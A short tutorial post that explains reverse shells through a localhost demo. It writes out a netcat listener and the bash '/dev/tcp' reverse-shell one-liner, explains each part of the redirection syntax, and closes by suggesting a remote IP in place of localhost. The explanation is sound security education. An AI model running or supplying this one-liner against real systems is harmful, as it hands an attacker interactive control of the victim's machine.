What is a reverse shell?

It’s a(n insecure) remote shell introduced by the target. That’s the opposite of a “normal” remote shell, that is introduced by the source.

Let’s try it with localhost instead of

  • Open two tabs in your terminal.
    1. open TCP port 8080 and wait for a connection:nc localhost -lp 8080
    2. Open an interactive shell, and redirect the IO streams to a TCP socket:bash -i >& /dev/tcp/localhost/8080 0>&1 where
      • bash -i “If the -i option is present, the shell is interactive.”
      • >& “This special syntax redirects both, stdout and stderr to the specified target.”
      • (argument for >&/dev/tcp/localhost/8080 is a TCP client connection to localhost:8080.
      • 0>&1 redirect file descriptor 0 (stdin) to fd 1 (stdout), hence the opened TCP socket is used to read input.
      Cf. http://wiki.bash-hackers.org/syntax/redirection
  • Rejoice as you have a prompt in tab 1.
  • Now imagine not using localhost, but some remote IP.

Leave a Comment